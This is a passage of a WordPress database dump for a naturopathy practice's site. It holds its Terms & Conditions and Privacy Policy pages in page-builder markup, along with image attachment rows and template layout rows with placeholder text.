(`post_type`,`post_status`,`post_author`) ) ENGINE=MyISAM AUTO_INCREMENT=1687 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_posts` -- LOCK TABLES `wpln_posts` WRITE; /*!40000 ALTER TABLE `wpln_posts` DISABLE KEYS */; INSERT INTO `wpln_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (2,1,'2021-04-30 12:04:58','2021-04-30 04:04:58','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" inline_fonts=\"Playfair Display SC,Playfair Display,Montserrat\"]<!-- divi:paragraph -->\n<h1 style=\"text-align: center;\"><span style=\"font-family: \'Playfair Display SC\';\"><strong> Terms & Conditions</strong></span></h1>\n<p> </p>\n<p><span style=\"font-family: Montserrat;\">Please be aware that any information we provide on this website, in blogs and in downloadable resources is general advice only. This information may not apply or could potentially be harmful to people in specific circumstances, so please seek medical advice before acting on this information to ensure your own safety, particularly if you have a medical condition or take any medications. There is no professional relationship formed unless you explicitly choose to work with us by purchasing our services or products.</span></p>\n<p><span style=\"font-family: Montserrat;\">Your health and safety are important to us. We expect you to use common sense when accessing the information on or downloaded from this website. Please contact us if you have any doubts or questions about the suitability of any general, nutritional, herbal or lifestyle advice provided on this website.</span></p>\n<p> </p>\n<h2><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\" font-family:=\"\" playfair=\"\" display=\"\" sc=\"\">Our Responsibility</span></strong></span></h2>\n<p><span style=\"font-family: Montserrat;\">Melissa Cann is a fully-qualified naturopath holding a Bachelor’s degree in Health Science (Naturopathy). This allows her to provide naturopathic services and dispense practitioner-only products. Naturopaths provide consultations which include thorough case-taking, physical examinations and the dispensing of products. Treatment plans may include natural remedies such as liquid herbs, flower essences, herbal infusions/teas, herbal creams and supplements, as well as dietary advice and meal planning, and lifestyle recommendations.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Your responsibility</span></strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Your health & safety is our priority & therefore we ask that you fill out a <u>Client Intake Form</u> prior to treatment. All information you provide will be confidential. Failure to complete this form will result in our inability to treat you in the interest of your health & safety. The information gathered during a medical history will assist in establishing this and developing the best treatment plan for you. </span></p>\n<p><span style=\"font-family: Montserrat;\">During a consult, we will discuss your presenting complaint and health history in order to make the safest and most effective treatment plan for you. To get a thorough picture, we require lots of information regarding symptoms, illnesses, body systems and processes, mental health, current living situation and family history. Current medications and supplements must be disclosed so as to ensure no interactions will occur between what we prescribe and what you are currently taking.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is your responsibility to inform us of any changes in your health status throughout your future treatments with us.</span></p>\n<p><span style=\"font-family: Montserrat;\">Please notify us immediately if you experience any worsening of symptoms or any unpleasant or unwanted side effects or reactions after commencing each new or recurring herbal medicine liquid, supplement or other treatment. Reactions may indicate a sensitivity or allergy to a herb so it is your responsibility to notify us immediately so we can rectify the issue. If a severe reaction occurs, please cease taking the prescribed remedy and seek medical advice immediately.</span></p>\n<p><span style=\"font-family: Montserrat;\">If you feel you have not provided accurate information during the consult, please contact us directly to rectify. Incorrect personal/health information provided may impact your treatment success and/or personal safety.</span></p>\n<p><span style=\"font-family: Montserrat;\">It is important you do not take any other supplements during the course of our treatment without first disclosing to us; this is to ensure no interactions will occur.</span></p>\n<p> </p>\n<h2><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal;\"><strong>Payment Terms</strong></span></h2>\n<p><span style=\"font-family: Montserrat;\">Payment for face-to-face consults is required at the completion of the appointment. </span></p>\n<p><span style=\"font-family: Montserrat;\">Payment for online consults is <strong>required at the time of booking </strong>through online payment system Stripe. Should you need to cancel your booking, the full consult fee will be refunded <span style=\"text-decoration: underline;\"><em>if more than 24 hours’ notice is provided</em></span>. If you cancel with <span style=\"text-decoration: underline;\"><em>less than 24 hours notice,</em></span> 50% of the consult fee will be taken and the remainder refunded to you. <span style=\"text-decoration: underline;\">No-show online consults will forfeit their full consult fee</span>.</span></p>\n<p><span style=\"font-family: Montserrat;\">Payments are taken via Stripe or Paypal. Please view their websites directly for their respective privacy policies.</span></p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Shipping</span></strong></span></h3>\n<p>Online consults: Shipping for personalised herbal tinctures, flower essences, teas and creams that we personally make up for you, will be free of charge when prescribed through a consult. If any repeats of herbal tinctures, flower essences, teas and creams that we personally make up for you are sold without a consult, you will be liable for shipping costs.</p>\n<p>A flat-rate shipping fee of $10 is charged. Alternatively, you may wish to pick up your prescription from Kalamunda free of charge.</p>\n<p>All consults: If a prescription is generated for you through online dispensary vital.ly (www.vital.ly), postage will be set at their prices, which can range from $6.90 to $12.50. Please refer to vital.ly delivery terms and prices directly on their site. If you have any questions regarding this, please contact us.</p>\n<p> </p>\n<h3><span style=\"font-size: x-large;\"><strong><span style=\"font-family: \'Playfair Display SC\';\">Order fulfilment through vital.ly</span></strong></span></h3>\n<p>Often, products will be out of stock through the online dispensary service that we use. If this occurs, please contact us and we will endeavour to find a suitable replacement product.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Online Consultations</strong></span></h4>\n<p>Online consults will be conducted securely via Cliniko Telehealth - <a href=\"https://help.cliniko.com/en/articles/3843932-telehealth-a-guide-for-patients\"><span style=\"color: #000000;\">please read through this info BEFORE</span></a> your scheduled appointment time to ensure our consult runs smoothly. You will receive an appointment link shortly after booking. You will also receive a Client Intake form that will need to be completed at least 48hrs before the appointment.<br />On the day of the appointment, click the Telehealth link 10-15 minutes before the start time to make sure your computer can access the link correctly and your microphone and video are in good working order.<br />For privacy reasons, the consult will not be recorded, and we ask that you not record it either. Please ensure you are in a quiet place with minimal interruptions to allow the consult to flow freely. If internet issues causes the consult to cut out, we will continue our consultation via phone call. Any time delay between contact will be added on to the total consult time so there is no loss of time.</p>\n<p> </p>\n<h3><strong><span style=\"font-family: \'Playfair Display SC\';\">Change of mind</span></strong></h3>\n<p>We do not offer a refund for change of mind for any services so please choose carefully. Please note that in order to provide safe and effective remedy prescriptions, we do not accept any product returns for refund as we cannot ascertain how the product was stored.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Cancellations and Reschedules</strong></span></h4>\n<p>Please respect our time and other clients who may wish to book your time slot by cancelling or rescheduling your appointment 24 hours or more in advance where possible. You will be sent a reminder text or email the day before your appointment to assist in the smooth running of the practice schedule.</p>\n<p>Clients are able to cancel or reschedule an appointment at anytime, without incurring a fee, provided <em><u>24 hours notice</u></em> is given where practicable. This allows the opportunity to offer the session to another client. If you cancel with <em><span style=\"text-decoration: underline;\">less than 24 hours notice,</span></em> you may be charged a <u>Late Cancellation Fee</u> equal to 50% of the full session fee. It is important to note that third parties, (ie Worksafe) will not pay for missed appointments, so you will be responsible for the entire Late Cancellation Fee.</p>\n<p>Extenuating circumstances may be considered and it is at the sole discretion of Verde Naturopathy whether or not to waive part or all of your booking fee as stated above.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>No-shows</strong></span></h4>\n<p>No-shows incur a 100% cost of your appointment fee. In fairness to other clients, we deem it unreasonable to continue offering sessions to those who regularly miss or cancel their appointments at late notice and as such, <u>after 2 unattended appointments</u> you will be required to pay the <u>full session fee</u> at the time of booking to secure a new appointment.</p>\n<p>Your understanding of this policy is appreciated.</p>\n<p> </p>\n<h4><span style=\"font-family: \'Playfair Display SC\'; font-weight: normal; font-size: x-large;\"><strong>Confidentiality and Privacy</strong></span></h4>\n<p>Please view our <span style=\"color: #000000;\"><a href=\"https://verdenaturopathy.com.au/privacy-policy/\" style=\"color: #000000;\">privacy policy</a> </span>for more details.</p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<p> </p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','T&C','','publish','closed','closed','','sample-page','','','2021-05-27 14:01:07','2021-05-27 06:01:07','',0,'https://verde.desidrivers.com.au/?page_id=2',0,'page','',0),(3,1,'2021-04-30 12:04:58','2021-04-30 12:04:58','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" custom_padding=\"|||\" hover_enabled=\"0\" custom_padding__hover=\"|||\" sticky_enabled=\"0\"][et_pb_text _builder_version=\"4.9.4\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" hover_enabled=\"0\" inline_fonts=\"Playfair Display\" sticky_enabled=\"0\"]<!-- divi:heading -->\n<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>PRIVACY POLICY</strong></span></h1>\n<p>At Verde Naturopathy, we are committed to protecting your privacy as a client and an online visitor to our website. We use the information we collect about you to maximize the services that we provide to you. We respect the privacy and confidentiality of the information provided by you and are bound by and adhere to the <em>Privacy Act (1988)</em> and Australian Privacy Principles.</p>\n<h1><strong>INFORMATION WE COLLECT FROM YOU</strong></h1>\n<p>In the course of your visits to our website or use of our Naturopathic services, we may obtain the following information about you: name, company name, email address, telephone number, credit card details, billing address, geographic location, IP address, survey responses, support queries, social media comments and handles (together ‘Personal Data’). Our services are not directed to persons under 18 and we do not knowingly collect Personal Data from anyone under 18 without parent or guardian consent. If we become aware that a child under 18 has provided us with Personal Data without parent or guardian consent, we will delete that information as quickly as possible. If you are the parent or guardian of a child and you believe they have provided us with Personal Data without your consent, then please contact us. We seek to ensure that the personal information we collect about you is accurate, up-to-date, relevant and complete.To assist us with this, we encourage you to contact us if you believe that any information we hold about you is inaccurate, out of date, incomplete, irrelevant or misleading.</p>\n<h1><strong>HOW WE USE YOUR INFORMATION</strong></h1>\n<p>We collect, hold, use and potentially disclose the information we collect from you for the following purposes; to maintain our business records and run our business, to contact you, for any purpose required or permitted by law, for any purpose you would otherwise reasonably expect, for any purpose disclosed to you and to which you have consented, to provide you with any technical support, to notify you of any updates and offers, to share useful content, to help us measure customer satisfaction, and to provide you with a personalised website experience.</p>\n<p>Marketing communications are only sent to you if you have requested or subscribed to them. You can opt out of our marketing communications at any time by unsubscribing or emailing us - your request will be actioned immediately.</p>\n<p>Any information you choose to make publicly available, such as blog comments will be available for others to see. If you subsequently remove this information, copies may remain viewable in cached and archived pages on other websites or if others have copied or saved the information.</p>\n<h1><strong>STORAGE AND SECURITY OF YOUR INFORMATION</strong></h1>\n<p>We will use all reasonable means to protect the confidentiality of your Personal Data while in our possession or control. All information we receive from you is stored and protected on our secure servers from unauthorized use or access. We hold your personal information in both paper-based and electronic files, in both cases stored securely. We seek to ensure that your personal information is protected from misuse, interference and loss; and unauthorised access, modification and disclosure. The personal information that we hold is treated as confidential and only accessed when necessary.</p>\n<p>We retain your personal information for as long as needed to provide services to you and as otherwise necessary to comply with our legal obligations, resolve disputes and enforce our agreements. In the event there is a breach of our security and your Personal Data is compromised, we will promptly notify you in compliance with the applicable law. </p>\n<h1><strong>SHARING YOUR INFORMATION <span style=\"font-family: \'Playfair Display\';\">WITH</span> THIRD PARTIES</strong></h1>\n<p>We do not and will not sell or deal any Personal Data or any customer information.</p>\n<p>Your Personal Data details are only disclosed to third party suppliers when it is required by law, for goods or services which you have purchased, for payment processing or to protect our copyright, trademarks and other legal rights. To the extent that we do share your Personal Data with a service provider, we would only do so if that party has agreed to comply with our privacy standards as described in this privacy policy and in accordance with applicable law. Our contracts with third parties prohibit them from using any of your Personal Data for any purpose other than that for which it was shared. </p>\n<h1><strong>DISCLOSURE OF YOUR INFORMATION</strong></h1>\n<p>We may from time to time need to disclose certain information, which may include your Personal Data, to comply with a legal requirement, such as a law, regulation, court order, subpoena, warrant, in the course of a legal proceeding or in response to a law enforcement agency request. Also, we may use your Personal Data to protect the rights, property or safety of Verde Naturopathy, our customers or third parties. If there is a change of control in one of our businesses (whether by merger, sale, transfer of assets or otherwise) customer information, which may include your Personal Data, could be transferred to a purchaser under a confidentiality agreement. We would only disclose your Personal Data in good faith and where required by any of the above circumstances. </p>\n<p>From time to time, we may also disclose your Personal Data to others involved in your health care, including doctors and specialists outside Verde Naturopathy, who may be involved in treating you, pathology services, radiology services and in emergency situations. This may occur through referral to other doctors or specialists, or for medical tests and in the reports or results returned to us following the referrals. This will always be in accordance with your consent.</p>\n<p>Typically, we only transfer your personal information overseas with your consent. The country in which the recipient is located is therefore determined by your consent.</p>\n<h1><strong>LINKS TO OTHER WEBSITES</strong></h1>\n<p>This website may contain links to other websites. These links are meant for your convenience only. Links to third party websites do not constitute sponsorship or endorsement or approval of these websites. Please be aware that we are not responsible for the privacy practices of such other websites. We encourage our users to be aware, when they leave our website, to read the privacy statements of each and every website that collects personally identifiable information. This privacy policy applies solely to information collected by this website.</p>\n<h1><strong>CHANGE IN PRIVACY POLICY</strong></h1>\n<p>As we plan to ensure our privacy policy remains current, this policy is subject to change. We may modify this policy at any time, in our sole discretion and all modifications will be effective immediately upon our posting of the modifications on this website. Please return periodically to review our privacy policy.</p>\n<h1><strong>CONTACT US</strong></h1>\n<p>If you have any questions or concerns at any time about our privacy policy or the use of your Personal Data, please contact us at hello@verdenaturopathy.com.au </p>\n<h1><strong>PERSONAL AND HEALTH INFORMATION COLLECTION STATEMENT </strong></h1>\n<p>Verde Naturopathy (“us”, “we”, “our”) only collect the information we need in order to perform our services (“Services”). We comply at all times with the Australian Privacy law which regulates how personal information is handled including all your health details which are considered sensitive information (‘Personal Sensitive Information’). We will not disclose your Personal Sensitive Information without your consent unless required due to a medical emergency, injury, health risk or similar and we will only do so to a qualified professional who is under the same duty of confidentiality. You may contact us by writing to Melissa Cann, hello@verdenaturopathy.com.au and you have the right to gain access to the information held by Verde Naturopathy about you. Our Privacy Policy on our website contains information on how you may request access to, and correction of, any of the information we hold about you including your Personal Sensitive Information and how you may complain about a breach of your privacy as well as how we will deal with a complaint. By providing us with this Personal Sensitive Information, you acknowledge and agree that the information you are providing to us is true and correct at the time you are providing it to us. You will notify us with any changes and keep it updated on a regular basis while you are using our Services. You can access your Personal Sensitive Information by request at any time. We keep your Personal Sensitive Information secure and do not use it for any purposes unrelated to our Services. From time to time, we may use your Personal Sensitive Information to contact you in relation to information on our Services. You can unsubscribe at any time or advise us that you withdraw your consent to these specific uses and be removed from any further marketing or information we may send.</p>\n<p>Important Note: Our Services are not a substitute for medical doctor attention, treatment, examination, advice or diagnosis. You are responsible for consulting a medical doctor before commencing any new regimes or alterations to your health. You take full responsibility for making the informed decision to use our Services. You hereby agree to irrevocably release and waive any claims you may have now or in the future against us.</p>\n<p><em>Updated May 2021</em></p>\n<p> </p>\n<p> </p>\n<p> </p>\n<!-- /divi:paragraph -->[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Privacy Policy','','publish','closed','open','','privacy-policy','','','2021-05-25 21:44:14','2021-05-25 13:44:14','',0,'https://verde.desidrivers.com.au/?page_id=3',0,'page','',0),(41,1,'2021-04-30 20:39:20','2021-04-30 12:39:20','','Standard-01','','inherit','open','closed','','standard-01','','','2021-04-30 20:39:20','2021-04-30 12:39:20','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/04/Standard-01.jpg',0,'attachment','image/jpeg',0),(42,1,'2021-04-30 20:39:45','2021-04-30 12:39:45','https://verde.desidrivers.com.au/wp-content/uploads/2021/04/cropped-Standard-01.jpg','cropped-Standard-01.jpg','','inherit','open','closed','','cropped-standard-01-jpg','','','2021-04-30 20:39:45','2021-04-30 12:39:45','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/04/cropped-Standard-01.jpg',0,'attachment','image/jpeg',0),(16,0,'2021-04-30 12:05:05','2021-04-30 12:05:05','<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"b578756\"} -->\n<!-- wp:pagelayer/pl_col {\"overlay_hover_delay\":\"400\",\"pagelayer-id\":\"4tj5809\"} -->\n<!-- wp:pagelayer/pl_post_title {\"title_color\":\"\",\"typo\":\",35,,700,,,solid,,,,\",\"align\":\"center\",\"pagelayer-id\":\"d4g9069\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"fixed\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"row_width\":\"70%\",\"fixed_width\":\"70%\",\"fixed_width_tablet\":\"85%\",\"fixed_width_mobile\":\"100%\",\"pagelayer-id\":\"ecg6644\"} -->\n<!-- wp:pagelayer/pl_col {\"overlay_hover_delay\":\"400\",\"col_width\":\"80\",\"col\":\"12\",\"pagelayer-id\":\"xvv8223\"} -->\n<!-- wp:pagelayer/pl_post_info {\"layout\":\"vertical\",\"space_between\":\"15\",\"align\":\"center\",\"icon_colors\":\"normal\",\"text_colors\":\"normal\",\"icon_color_normal\":\"#444444ff\",\"text_color_normal\":\"#444444ff\",\"pagelayer-id\":\"9ol8190\"} -->\n<!-- wp:pagelayer/pl_post_info_list {\"type\":\"author\",\"info_link\":\"true\",\"info_icon_on\":\"true\",\"info_icon\":\"fas fa-user-circle\",\"pagelayer-id\":\"wt24734\"} /-->\n<!-- wp:pagelayer/pl_post_info_list {\"type\":\"date\",\"info_link\":\"true\",\"info_icon_on\":\"true\",\"info_icon\":\"fas fa-calendar-alt\",\"date_format\":\"default\",\"pagelayer-id\":\"tsu8531\"} /-->\n<!-- wp:pagelayer/pl_post_info_list {\"type\":\"time\",\"info_link\":\"true\",\"info_icon_on\":\"true\",\"info_icon\":\"fas fa-clock\",\"time_format\":\"default\",\"pagelayer-id\":\"cpd2731\"} /-->\n<!-- wp:pagelayer/pl_post_info_list {\"type\":\"comments\",\"info_link\":\"true\",\"info_icon_on\":\"true\",\"info_icon\":\"fas fa-comment\",\"pagelayer-id\":\"bkm9327\"} /-->\n<!-- /wp:pagelayer/pl_post_info -->\n<!-- wp:pagelayer/pl_post_excerpt {\"pe_margin\":\"20px,0px,15px,0px\",\"align\":\"left\",\"color\":\"\",\"pagelayer-id\":\"2e01364\"} /-->\n<!-- wp:pagelayer/pl_featured_img {\"size\":\"full\",\"img_filter\":\"0,100,100,0,0,100,100\",\"caption_color\":\"#0986c0\",\"img_hover_delay\":\"400\",\"custom_size\":\"70%,0%\",\"align\":\"center\",\"pagelayer-id\":\"tgy2127\"} /-->\n<!-- wp:pagelayer/pl_post_content {\"ele_margin\":\"25px,0px,35px,0px\",\"font_size\":\"NaN\",\"pagelayer-id\":\"57m6630\"} /-->\n<!-- wp:pagelayer/pl_post_info {\"layout\":\"horizontal\",\"space_between\":\"5\",\"align\":\"left\",\"icon_colors\":\"normal\",\"text_colors\":\"normal\",\"input_typo\":\",,,,,,Solid,,,,\",\"text_color_normal\":\"#444444ff\",\"pagelayer-id\":\"f8g8666\"} -->\n<!-- wp:pagelayer/pl_post_info_list {\"type\":\"terms\",\"info_link\":\"true\",\"info_icon_on\":\"\",\"info_icon\":\"fas fa-user-circle\",\"taxonomy\":\"category\",\"info_before\":\"Category :\",\"pagelayer-id\":\"o6w7833\"} /-->\n<!-- wp:pagelayer/pl_post_info_list {\"type\":\"terms\",\"info_link\":\"true\",\"info_icon_on\":\"\",\"info_icon\":\"fas fa-user-circle\",\"taxonomy\":\"post_tag\",\"info_before\":\"Tags :\",\"pagelayer-id\":\"vhu7667\"} /-->\n<!-- /wp:pagelayer/pl_post_info -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"fixed\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"fixed_width\":\"70%\",\"pagelayer-id\":\"crh5402\"} -->\n<!-- wp:pagelayer/pl_col {\"overlay_hover_delay\":\"400\",\"pagelayer-id\":\"s713130\"} -->\n<!-- wp:pagelayer/pl_post_nav {\"lables\":\"true\",\"post_title\":\"true\",\"arrows\":\"true\",\"sep_color\":\"#bdbdbd\",\"sep_rotate\":\"20\",\"sep_width\":\"5\",\"prev_label\":\"Previous\",\"next_label\":\"Next\",\"label_colors\":\"normal\",\"title_colors\":\"normal\",\"arrows_list\":\"angle\",\"icon_colors\":\"normal\",\"label_color\":\"#444444ff\",\"title_color\":\"#444444ff\",\"icon_color\":\"#444444ff\",\"pagelayer-id\":\"rbg8363\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->\n<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"fixed\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"fixed_width\":\"70%\",\"pagelayer-id\":\"eu55280\"} -->\n<!-- wp:pagelayer/pl_col {\"overlay_hover_delay\":\"400\",\"pagelayer-id\":\"w4o7752\"} -->\n<!-- wp:pagelayer/pl_post_comment {\"comment_skin\":\"theme_comment\",\"post_type\":\"current\",\"post_id\":\"5588\",\"pagelayer-id\":\"nif6720\"} /-->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->','Single Template','','publish','closed','closed','','single-template','','','2021-04-30 12:05:05','2021-04-30 12:05:05','',0,'https://verde.desidrivers.com.au/?p=16',0,'pagelayer-template','',0),(17,0,'2021-04-30 12:05:05','2021-04-30 12:05:05','<!-- wp:pagelayer/pl_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"column_pos\":\"default\",\"content_pos\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_bg_type\":\"image\",\"ele_bg_color\":\"#eeaa6dff\",\"ele_padding\":\"60px,0px,60px,0px\",\"ele_bg_attachment\":\"scroll\",\"ele_bg_posx\":\"center\",\"ele_bg_posy\":\"center\",\"ele_bg_repeat\":\"no-repeat\",\"ele_bg_size\":\"cover\",\"overlay_transperancy\":\"0.7\",\"overlay_color\":\"#111110fa\",\"ele_bg_img\":\"6\",\"overlay_type\":\"color\",\"pagelayer-id\":\"bhx9125\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"pagelayer-id\":\"mad7539\"} -->\n<!-- wp:pagelayer/pl_wp_title {\"site_name\":\"Tripo\",\"site_title_state\":\"normal\",\"text-align\":\"center\",\"ele_bg_hover_delay\":\"400\",\"site_title_style\":\",28,,600,,,Solid,,Uppercase,,\",\"title_color\":\"#ffffffff\",\"logo_img_size\":\"custom\",\"align\":\"left\",\"vertical_align\":\"middle\",\"site_logo\":\"true\",\"logo_img_type\":\"custom-logo\",\"logo_img\":\"15\",\"logo_img_custom_size\":\"17\",\"pagelayer-id\":\"gmm4164\"} /-->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"text\":\"\\n\\n\\n\\n\\n\\u003cp\\u003e\\u003cspan\\u003eLorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh. \\u003c\\/span\\u003e\\u003c\\/p\\u003e\",\"pagelayer-id\":\"cq39784\"} --><p><span>Lorem ipsum dolor sit amet ectetur adipiscing elit. Nullam eget dolor sit amet sed diam nonummy nibh. </span></p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"text\":\"\\n\\n\\n\\n\\u003cp\\u003e\\u003cspan\\u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra. Nibh venenatis cras sed felis eget velit aliquet sagittis.\\u003c\\/span\\u003e\\u003c\\/p\\u003e\",\"pagelayer-id\":\"70g5479\"} --><p><span>Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra. Nibh venenatis cras sed felis eget velit aliquet sagittis.</span></p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_social_grp {\"align\":\"left\",\"group_layout\":\"pagelayer-btn-grp-horizontal\",\"icon_spacing\":\"6\",\"icon_size\":\"20\",\"color_scheme\":\"\",\"icon_color\":\"#ffffffff\",\"social_hover_delay\":\"400\",\"icon_color_hover\":\"#ffffff\",\"ele_bg_hover_delay\":\"400\",\"bg_shape\":\"\",\"bg_size\":\"8\",\"icon_bg_color\":\"#3e8ef700\",\"icon_bg_color_hover\":\" \",\"icon_border_color\":\"#ffffffff\",\"icon_border_width\":\"2,2,2,2\",\"social_hover\":\"\",\"pagelayer-id\":\"1sf6279\"} -->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-facebook-f\",\"social_url\":\"https:\\/\\/facebook.com\\/sitepad\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"osv5317\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-twitter\",\"social_url\":\"https:\\/\\/twitter.com\\/sitepad\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"xa01420\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-instagram\",\"social_url\":\"https:\\/\\/www.instagram.com\\/sitepad\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"mnh6658\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-google-plus-g\",\"social_url\":\"https:\\/\\/plus.google.com\\/sitepad\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"ck56361\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-linkedin-in\",\"social_url\":\"https:\\/\\/linkedin.com\\/sitepad\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"hh42096\"} /-->\n<!-- wp:pagelayer/pl_social {\"icon\":\"fab fa-youtube\",\"social_url\":\"https:\\/\\/youtube.com\\/sitepad\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"5fk2559\"} /-->\n<!-- /wp:pagelayer/pl_social_grp -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"col\":\"4\",\"pagelayer-id\":\"m8s1494\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"left\",\"heading_typo\":\",28,,600,,,Solid,,Uppercase,,\",\"ele_padding\":\"0px,0px,19px,0px\",\"text\":\"\\u003ch4\\u003eGet in Touch\\u003c\\/h4\\u003e\",\"pagelayer-id\":\"j1t6263\"} --><h4>Get in Touch</h4><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_address {\"icon\":\"fas fa-map-marker-alt\",\"ele_bg_hover_delay\":\"400\",\"space\":\"15\",\"color\":\"#ffffffff\",\"icon_color\":\"#ffffffff\",\"pagelayer-id\":\"9rn1391\"} /-->\n<!-- wp:pagelayer/pl_email {\"icon\":\"fas fa-envelope\",\"ele_bg_hover_delay\":\"400\",\"space\":\"15\",\"color\":\"#ffffffff\",\"icon_color\":\"#ffffffff\",\"pagelayer-id\":\"xa51470\"} /-->\n<!-- wp:pagelayer/pl_phone {\"icon\":\"fas 